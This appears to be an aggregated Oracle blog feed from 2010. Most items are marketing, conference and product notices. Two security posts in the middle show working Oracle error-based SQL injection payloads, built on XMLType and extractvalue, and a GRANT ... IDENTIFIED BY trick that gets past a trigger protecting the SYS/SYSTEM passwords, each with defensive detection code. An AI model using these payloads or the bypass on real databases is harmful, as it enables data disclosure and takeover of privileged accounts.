Oracle Database 11g helps BMW ORACLE Racing win America's Cup
I recently sat down with Ian "Fresh" Burns, design coordinator for the BMW ORACLE Racing trimaran, and talked about how technology helped win back the America's Cup. An amazing sight to see on the water, the BMW ORACLE Racing trimaran is able to travel at 4 times the wind speed, is as large as a baseball diamond, and has a wing sail that's 23 stories tall. Some of you will be interested to learn from Fresh how Oracle Database 11g played a major part in helping BMW ORACLE Racing win the oldest active trophy in International sport. Plus, Fresh shares a couple of other interesting bits about the race.
To learn more, tune into our podcast conversation with Fresh.

Oracle OpenWorld 2010 Call For Papers
Oracle OpenWorld 2010 Call For Papers is now open.
Oracle OpenWorld is the place to present your database ideas, experiences, and accomplishments to tens of thousands of the world's most demanding Oracle users.
Submit a database paper and you could present your ideas to the highest-profile technology thought leaders, C-level executives from the Fortune 100, peers from around the world, and the most-influential members of the media.
We are eager to hear your database ideas, implementations and experiences, and we invite you to share them with the entire Oracle community. Now is your chance to be heard. The CFP closes at 11:59 pm PDT on Sunday, March 21.
Get started at http://ow.ly/1eJYk
We'll see you at the show!
March 1-7 is National Procrastination Week
"InterXpress for Firebird" 2.3.0 released
"InterXpress for Firebird" is our driver that supports Borland's dbExpress technology! Today we release version 2.3.0 of our driver; this version includes support for Delphi 2010.
You can download a copy of it at http://www.upscene.com.
Currently supported are Delphi 6, Delphi 7, BDS 2006, Delphi 2007, RAD Studio/Delphi 2009/2010, Kylix 3 and C++Builder 6.
What's fixed, new and changed? Check it out here:
http://customer.upscene.com/script/mantisgateway.exe/fixed?fixedin=2.3.0&projectid=19
http://customer.upscene.com/script/mantisgateway.exe/fixed?fixedin=2.2.0&projectid=19
http://customer.upscene.com/script/mantisgateway.exe/fixed?fixedin=2.1.0&projectid=19
With InterXpress for Firebird you have guaranteed access to Firebird and all its features. The driver comes in two versions:
- Desktop Edition
- Server Edition
All versions come with a full year of support and maintenance updates. The support period can be extended at a reduced price after the first year.
Desktop Edition
The Desktop Edition is aimed at deploying and developing applications that use a localhost or local protocol connection and accepts up to four connections per client process. The license includes full rights to deploy the driver at any number of sites for any number of workstations.
Server Edition
The Server Edition is aimed at deploying and developing applications that require a remote connection (client/server) and allows unlimited connections from a single client process. The license includes unlimited rights to deploy the driver at any number of sites for any number of workstations and/or servers.
Countdown: Oracle Spatial User Conference
Mark your calendar for the 2010 Oracle Spatial User Conference, April 29 in Phoenix. This annual event, held in tandem with the GITA Geospatial Infrastructure Solutions Conference, continues to grow in popularity. Check out this year's agenda for some great case studies from the US Census Bureau, AngloAshanti Gold, and lots more. Oracle's hosting some cool new technical workshops, too. Register here.
Get more information about Oracle Spatial 11g on oracle.com and OTN.
On Demand Webcast - Consolidate for Business Advantage: From Storage to Scorecard
In case you missed the live event, a replay of the webcast Consolidate for Business Advantage: From Storage to Scorecard is now available.
With insights into enterprise-wide information, companies can support a broad range of strategic, financial, and operational processes that meet their extreme performance, scalability, and total cost of ownership requirements. But getting actionable and timely information in the hands of the right decision makers can be tricky, especially when you must consolidate data from disparate systems throughout the enterprise.
As the market leader in data warehousing, enterprise performance management, and business intelligence, Oracle combines best-in-class capabilities to provide a complete, open, and integrated solution from storage to scorecard. Watch this webcast to learn how to:
• Drive pervasive insights and decision-making with Oracle Business Intelligence
• Unify enterprise information at low cost with Oracle Data Integration Suite
• Get extreme performance and manage data growth with Oracle data warehousing
The NoSQL That Must Not Be Named!
Meet Oracle at Sonoma Workshop 2010
For some time, Infiniband has been working its way into the data center as the fabric of choice for low latency, high bandwidth database environments. And with Oracle Exadata V2, Oracle introduced the perfect example of a massively parallel database grid using OFA-driven Infiniband. In addition, now that Oracle is integrating Sun Microsystems' portfolio of Infiniband products and technologies, Oracle is uniquely positioned to deliver truly extreme performance throughout the enterprise.
To learn more, join Oracle at the Sonoma Workshop 2010 on March 15th. Tim Shetler, VP of Oracle Product Management, is hosting a session on how Oracle is using Infiniband to enable massively scalable databases and to meet the demanding I/O requirements of today's and tomorrow's Data Warehousing and OLTP applications.
Register and get details here.
Would you like a free pass to ODTUG Kaleidoscope 2010? How about a hotel upgrade?
Oracle Magazine, March/April 2010
Oracle at TDWI Vegas
If attendance at trade shows is any sort of indicator of how the economy is doing, then the TDWI World Conference in Vegas proves that the economy is on an upswing - according to organizers there were over 700 paid attendees, a significant uptick from recent events. The Oracle booth drew a large crowd interested in learning about the wide range of Oracle solutions for data warehousing and business intelligence, including the Sun Oracle Database Machine, Oracle Database 11g, Oracle Data Integrator, Oracle Business Intelligence Enterprise Edition and Oracle Essbase.
Oracle hosted a free 2-hour Oracle Data Warehousing Best Practices Workshop. This session is quickly becoming an Oracle highlight at TDWI, with attendees walking away with practical tips and tricks from Oracle product managers for optimizing the performance of their data warehouse. Equally valuable was the information about deploying Oracle in their real-world environments users shared with each other during the session.
Next stop: the TDWI World Conference in Chicago - see you there!

IOUG: 2010 Enterprise Platform Survey
The Independent Oracle User Group (IOUG) is an excellent source of information, learning and knowledge sharing on all aspects of Oracle technologies and applications. In addition to organizing events (e.g. Collaborate 10, April 18-22 in Las Vegas), Special Interest Groups (e.g. RAC, Exadata, etc.) and Webcasts, the IOUG regularly runs independent surveys of its member organizations.
Here's a great example; the IOUG's 2010 Enterprise Platform Survey examines the challenges organizations today are facing and the steps IT departments are taking to better manage their data centers. The Executive Summary of findings makes interesting reading, and the full report can be found here (requires log in to IOUG site).
On Everquest, Emulators and MySQL
2 new ways to create error messages
Today I came across a nice blog article, “Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle” by Dmitry Evteev, about new techniques which can be used in error-based SQL injection. One of the comments contains an additional technique. Even if the title of the blog is not correct for Oracle (it’s not blind SQL injection, it’s error-based, which is a small but important difference), the idea itself is nice. Sometimes the SQL statements are more complicated than necessary.
Using error messages of XMLType:
XMLType makes it possible to create error messages containing custom strings (like database users, passwords, …). The string must start with '<:', which is why we have to concatenate '<:' to the string. Additionally, all spaces and at-signs must be replaced.
SQL> select XMLType(('<:'||user||'>')) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName ":SYS" (not a Name)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 0
ORA-06512: at line 1
SQL> select XMLType(('<:'||replace((select banner from v$version where rownum=1),' ','')||'>')) from dual;
ERROR:
19
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName
":Oracle9iEnterpriseEditionRelease9.2.0.8.0-Production" (not a Name)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 0
ORA-06512: at line 1
This can be used in an SQL Injection statement:
or 1=length(XMLType(('<:'||replace((select banner from v$version where rownum=1),' ','')||'>')))--
The second technique is mentioned in the comments:
SQL> select extractvalue(xmltype('<x/>'),'/$'||(SELECT banner FROM v$version where rownum=1)) from dual;
*
ERROR at line 1:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00601: Invalid token in: '/$Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
This can be used in an SQL Injection statement:
or 1=length(extractvalue(xmltype('<x/>'),'/$'||(SELECT banner FROM v$version where rownum=1)))--
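Both techniques only work when the database error text reaches the client. The following is an added example, not code from the original post: a response-side filter that recognises the ORA-/LPX- error stack shown above, keeps the detail in a server-side log, and returns a generic message instead. The function name `scrub_db_error`, the log structure and the sample text are constructed for illustration.

```python
import re
import uuid

# Oracle error-stack codes as they appear in the sessions above
# (ORA-31011, ORA-19202, LPX-00110, LPX-00601, ...).
ORACLE_CODE = re.compile(r"\b(?:ORA|LPX)-\d{5}\b")

# XML parser messages that quote caller-supplied text back in the error.
ECHOING_CODES = {"LPX-00110", "LPX-00601"}


def scrub_db_error(body, incident_log):
    """Return (safe_body, ref). ref is None when no Oracle error text was found.

    The full error stack goes to incident_log (server side) and never to the
    client; echoes_data marks stacks whose message repeats query data.
    """
    codes = sorted(set(ORACLE_CODE.findall(body)))
    if not codes:
        return body, None
    ref = uuid.uuid4().hex[:12]
    incident_log.append({
        "ref": ref,
        "codes": codes,
        "echoes_data": bool(ECHOING_CODES & set(codes)),
        "detail": body,
    })
    return "An internal error occurred (ref %s)." % ref, ref


# Constructed sample: the error stack from the first XMLType session above.
SAMPLE_ERROR = (
    "ORA-31011: XML parsing failed\n"
    "ORA-19202: Error occurred in XML processing\n"
    'LPX-00110: Warning: invalid QName ":SYS" (not a Name)\n'
)

if __name__ == "__main__":
    log = []
    print(scrub_db_error(SAMPLE_ERROR, log)[0])
    print(log[0]["codes"], log[0]["echoes_data"])
```
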
How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password and how to bypass it
I found the following nice article “How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password” [271077.1] on My Oracle Support. As always, when I see PL/SQL code, I look for ways to find security problems or to bypass limitations.
SQL> conn / as sysdba
Connected.
SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
  -- Reject ALTER USER when the target account is SYS or SYSTEM
  IF ora_sysevent='ALTER' and ora_dict_obj_type = 'USER' and
    (ora_dict_obj_name = 'SYSTEM' or ora_dict_obj_name = 'SYS')
  THEN
    RAISE_APPLICATION_ERROR(-20003,
      'You are not allowed to alter SYSTEM/SYS user.');
  END IF;
END;
/
Trigger created.
SQL> conn scott/tiger
Connected.
SQL> alter user system identified by alex;
alter user system identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5
SQL> alter user sys identified by alex;
alter user sys identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5
SQL> alter user dbsnmp identified by dbsnmp;
User altered.
Many Oracle users are not aware that the grant command can also be used to change passwords or even create users ("grant dba to user1,user2 identified by user1,user2"). In our case we can use this technique to bypass the database trigger.
SQL> grant connect to sys identified by alex;
Grant succeeded.
SQL> grant connect to system identified by alex;
Grant succeeded.
To fix this problem we have to block grant commands as well….
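For monitoring, the point above means that a check on password changes has to cover both statement forms. The following is an added example, not code from the original post or from the My Oracle Support note: it classifies statement text (assumed to come from an audit trail or DDL log) and reports ALTER USER and GRANT ... IDENTIFIED BY statements that target protected accounts. The function names and the sample list are constructed.

```python
import re

PROTECTED = {"SYS", "SYSTEM"}

# ALTER USER <name> IDENTIFIED BY ...
ALTER_USER = re.compile(
    r'^\s*ALTER\s+USER\s+("[^"]+"|\w+)\s+IDENTIFIED\s+BY\b', re.I)
# GRANT <privs/roles> TO <name>[,<name>...] IDENTIFIED BY ...
GRANT_IDENT = re.compile(
    r'^\s*GRANT\s+.+?\s+TO\s+(.+?)\s+IDENTIFIED\s+BY\b', re.I | re.S)


def _norm(name):
    """Unquoted identifiers fold to upper case; quoted ones keep their case."""
    name = name.strip()
    return name[1:-1] if name.startswith('"') else name.upper()


def password_change_targets(stmt):
    """Return (statement kind, accounts whose password the statement sets)."""
    m = ALTER_USER.match(stmt)
    if m:
        return "ALTER USER", [_norm(m.group(1))]
    m = GRANT_IDENT.match(stmt)
    if m:
        return "GRANT", [_norm(n) for n in m.group(1).split(",")]
    return None, []


def violations(statements, protected=PROTECTED):
    """List (kind, protected accounts touched) for each offending statement."""
    hits = []
    for stmt in statements:
        kind, users = password_change_targets(stmt)
        touched = sorted(set(users) & set(protected))
        if touched:
            hits.append((kind, touched))
    return hits


# Constructed sample, using the statements shown in the sessions above.
SAMPLE = [
    "alter user system identified by alex",
    "alter user dbsnmp identified by dbsnmp",
    "grant connect to sys identified by alex",
    "grant dba to user1,user2 identified by user1,user2",
    "grant connect to scott",
]

if __name__ == "__main__":
    print(violations(SAMPLE))
```
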
Tom Kyte to Speak on Oracle Database Upgrades
Join well-known Oracle expert Tom Kyte, Senior Technical Architect in Oracle's Server Technology Division and host of AskTom.Oracle.Com, to learn the latest best practices, hints, and tips for successful upgrades to Oracle Database 11g. If you are planning to upgrade from Oracle9i Database or Oracle Database 10g, this live Webcast is a rare opportunity to learn firsthand from the Oracle expert everything you need to know about upgrading to Oracle Database 11g, including:
-All the required preparatory steps
-Database upgrade strategies
-Post upgrade performance analysis
-Helpful tips and common pitfalls to watch out for.
Register for this Tuesday, March 26, 2010 10:00am PT | 1:00pm ET event
Oracle Recognized as a Leader in Data Mining
According to "The Forrester Wave™: Predictive Analytics And Data Mining Solutions, Q1 2010" report written by Forrester Senior Analyst James G. Kobielus, Oracle is a Leader in predictive analytics and data mining (PA/DM).
Kobielus states that, "Oracle provides a PA/DM solution portfolio that is built into its own widely adopted DBMS, DW, data integration, and BI platforms, with a wide range of prepackaged predictive applications, and it provides a powerful assortment of algorithms for mining complex structured and unstructured information types."
Oracle Data Mining is an option to Oracle Database 11g Enterprise Edition that enables customers to integrate actionable predictive information and build into business intelligence and other applications. Using the data mining functionality in Oracle Database 11g, customers can easily find patterns and insights otherwise hidden in their data warehouses.
The Sun Oracle Database Machine delivers increased Oracle Data Mining performance by performing scoring of data mining models in Oracle Exadata Storage Servers.
Read the report here.
Bentley Maps in 3D with Oracle Spatial 11g
Longtime computer graphics software leader Bentley Systems is using Oracle Database 11g and the 3D capabilities of Oracle Spatial 11g to support city modeling, urban planning, and other 3D mapping and analysis applications. Listen to this new Oracle Database Podcast to find out more.